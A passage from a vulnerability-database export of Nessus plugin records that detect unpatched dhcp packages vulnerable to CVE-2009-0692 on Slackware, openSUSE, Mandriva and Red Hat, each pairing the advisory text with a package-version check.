value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"11.0\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:55:20", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is likely caught by the buffer overflow checking of the FORTIFY_SOURCE extension.", "cvss3": {}, "published": "2009-10-06T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : dhcp (dhcp-6336)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:dhcp", "p-cpe:/a:novell:opensuse:dhcp-client", "p-cpe:/a:novell:opensuse:dhcp-devel", "p-cpe:/a:novell:opensuse:dhcp-relay", "p-cpe:/a:novell:opensuse:dhcp-server", "cpe:/o:novell:opensuse:10.3"], "id": "SUSE_DHCP-6336.NASL", "href": "https://www.tenable.com/plugins/nessus/41996", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dhcp-6336.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41996);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"openSUSE 10 Security Update : dhcp (dhcp-6336)\");\n script_summary(english:\"Check for the dhcp-6336 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is\nlikely caught by the buffer overflow checking of the FORTIFY_SOURCE\nextension.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-3.0.6-24.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-client-3.0.6-24.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-devel-3.0.6-24.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-relay-3.0.6-24.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-server-3.0.6-24.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp-client\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:14", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is likely caught by the buffer overflow checking of the FORTIFY_SOURCE extension.", "cvss3": {}, "published": "2009-07-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : dhcp (dhcp-1067)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:dhcp", "p-cpe:/a:novell:opensuse:dhcp-client", "p-cpe:/a:novell:opensuse:dhcp-devel", "p-cpe:/a:novell:opensuse:dhcp-relay", "p-cpe:/a:novell:opensuse:dhcp-server", "cpe:/o:novell:opensuse:11.1"], "id": "SUSE_11_1_DHCP-090626.NASL", "href": "https://www.tenable.com/plugins/nessus/40212", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dhcp-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40212);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"openSUSE Security Update : dhcp (dhcp-1067)\");\n script_summary(english:\"Check for the dhcp-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is\nlikely caught by the buffer overflow checking of the FORTIFY_SOURCE\nextension.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=515599\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-3.1.1-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-client-3.1.1-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-devel-3.1.1-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-relay-3.1.1-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-server-3.1.1-6.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp-client\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:51:50", "description": "A vulnerability has been found and corrected in ISC DHCP :\n\nStack-based buffer overflow in the script_write_params method in client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option (CVE-2009-0692).\n\nThis update provides fixes for this vulnerability.", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : dhcp (MDVSA-2009:151)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:dhcp-client", "p-cpe:/a:mandriva:linux:dhcp-common", "p-cpe:/a:mandriva:linux:dhcp-devel", "p-cpe:/a:mandriva:linux:dhcp-doc", "p-cpe:/a:mandriva:linux:dhcp-relay", "p-cpe:/a:mandriva:linux:dhcp-server", "cpe:/o:mandriva:linux:2008.1", "cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2009.1"], "id": "MANDRIVA_MDVSA-2009-151.NASL", "href": "https://www.tenable.com/plugins/nessus/39804", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:151. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39804);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"MDVSA\", value:\"2009:151\");\n\n script_name(english:\"Mandriva Linux Security Advisory : dhcp (MDVSA-2009:151)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in ISC DHCP :\n\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before\n4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers\nto execute arbitrary code via a crafted subnet-mask option\n(CVE-2009-0692).\n\nThis update provides fixes for this vulnerability.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-client-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-common-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-devel-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-doc-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-relay-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-server-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-client-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-common-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-devel-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-doc-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-relay-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-server-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-client-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-common-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-devel-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-doc-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-relay-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-server-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:51:28", "description": "Updated dhcp packages that fix a security issue are now available for Red Hat Enterprise Linux 4 and 4.7 Extended Update Support.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer overflow flaw in the ISC DHCP client. If the DHCP client were to receive a malicious DHCP response, it could crash or execute arbitrary code with the permissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2009-07-15T00:00:00", "type": "nessus", "title": "RHEL 4 : dhcp (RHSA-2009:1136)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:dhclient", "p-cpe:/a:redhat:enterprise_linux:dhcp", "p-cpe:/a:redhat:enterprise_linux:dhcp-devel", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:4.7", "cpe:/o:redhat:enterprise_linux:4.8"], "id": "REDHAT-RHSA-2009-1136.NASL", "href": "https://www.tenable.com/plugins/nessus/39798", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1136. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39798);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"RHSA\", value:\"2009:1136\");\n\n script_name(english:\"RHEL 4 : dhcp (RHSA-2009:1136)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dhcp packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 4.7 Extended Update Support.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to\nreceive a malicious DHCP response, it could crash or execute arbitrary\ncode with the permissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-0692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1136\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dhclient, dhcp and / or dhcp-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1136\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) 